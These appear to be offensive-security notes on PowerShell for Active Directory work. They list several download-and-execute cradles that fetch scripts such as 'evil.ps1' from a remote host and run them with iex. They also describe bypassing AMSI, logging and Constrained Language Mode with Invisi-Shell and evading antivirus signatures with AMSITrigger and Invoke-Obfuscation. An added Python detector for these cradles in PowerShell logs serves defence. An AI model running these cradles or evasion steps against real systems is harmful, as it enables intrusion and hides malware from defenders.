# PowerShell

## Loading a Module

Load a PowerShell script using dot sourcing:

```
. C:\AD\Tools\PowerView.ps1
```

A module (or a script) can be imported with:

```
Import-Module C:\AD\Tools\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1
```

All the commands in a module can be listed with:

```
Get-Command -Module <modulename>
```

## Script Execution

Download-execute cradles. Each one fetches a script over HTTP and passes the returned text straight to `iex`:

```
# System.Net.WebClient
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

# InternetExplorer COM object
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

# PSv3 onwards: Invoke-WebRequest (iwr)
iex (iwr 'http://192.168.230.1/evil.ps1')

# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText

# System.Net.WebRequest
$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
```
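The defender's view of these cradles, as an added example that is not part of the original page: detection logic run over the `ScriptBlockText` that Script Block Logging writes to Event ID 4104, flagging only blocks that combine a network fetch primitive with `iex`, so plain downloads and module imports pass. The event texts below are constructed for this example; in practice the same functions would be fed records pulled from the Microsoft-Windows-PowerShell/Operational log.

```python
import re

# Constructed stand-ins for the ScriptBlockText field of Event ID 4104
# (Microsoft-Windows-PowerShell/Operational). Script Block Logging records
# code as PowerShell compiles it, so cradle text is visible even when the
# launching command line was not captured.
SAMPLE_EVENTS = [
    {"id": 1, "text": "iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')"},
    {"id": 2, "text": "$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText"},
    {"id": 3, "text": "iex (iwr 'http://192.168.230.1/evil.ps1')"},
    {"id": 4, "text": "$wr = [System.NET.WebRequest]::Create(\"http://192.168.230.1/evil.ps1\")\n$r = $wr.GetResponse()\nIEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()"},
    # Benign: a module import, and a download saved to disk rather than executed.
    {"id": 5, "text": "Import-Module C:\\AD\\Tools\\ADModulemaster\\ActiveDirectory\\ActiveDirectory.psd1"},
    {"id": 6, "text": "Invoke-WebRequest -Uri 'https://example.invalid/tool.zip' -OutFile tool.zip"},
]

# Execution sink: Invoke-Expression or its alias iex.
EXECUTE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)

# Fetch primitives used by the cradles above; the key is what the alert reports.
FETCH = {
    "WebClient.DownloadString": re.compile(r"net\.webclient.*?downloadstring", re.I | re.S),
    "Invoke-WebRequest": re.compile(r"\b(?:iwr|invoke-webrequest)\b", re.I),
    "Msxml2.XMLHTTP": re.compile(r"msxml2\.xmlhttp", re.I),
    "System.Net.WebRequest": re.compile(r"system\.net\.webrequest", re.I),
    "InternetExplorer.Application": re.compile(r"internetexplorer\.application", re.I),
}


def classify(script_text):
    """Return fetch primitives present only when the block also feeds text to iex.

    Requiring both halves keeps plain downloads (-OutFile) and plain iex use out
    of the results; only the fetch-then-execute combination is flagged.
    """
    if not EXECUTE.search(script_text):
        return []
    return [name for name, pattern in FETCH.items() if pattern.search(script_text)]


def scan(events):
    """Map event id -> matched primitives for every event that looks like a cradle."""
    return {e["id"]: hits for e in events if (hits := classify(e["text"]))}


if __name__ == "__main__":
    for event_id, primitives in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: download cradle via {', '.join(primitives)}")
```

Obfuscated variants will defeat these literal patterns, which is why the logged text matters: Script Block Logging captures the block after PowerShell has resolved it, so layered encodings still surface as one of these primitives once they execute.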

## Invisi-Shell

To bypass:

* System-wide transcription
* AMSI
* System Block Logging
* CLM

Using Invisi-Shell:

With admin privileges:

```
RunWithPathAsAdmin.bat
```

With non-admin privileges:

```
RunWithRegistryNonAdmin.bat
```

Type `exit` from the new PowerShell session to complete the clean-up.

## Bypassing AV Signatures for PowerShell

Use tools like AMSITrigger and DefenderCheck to find out which part of the script Defender is detecting.

To obfuscate the entire script, use Invoke-Obfuscation.

### AMSI Trigger

The steps to avoid signature-based detection are straightforward:

1. Scan using AMSITrigger
2. Modify the detected code snippet
3. Rescan using AMSITrigger
4. Repeat steps 2 and 3 until the result is `AMSI_RESULT_NOT_DETECTED` or blank

Simply provide the path to the script file to scan it:

```
AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1
```
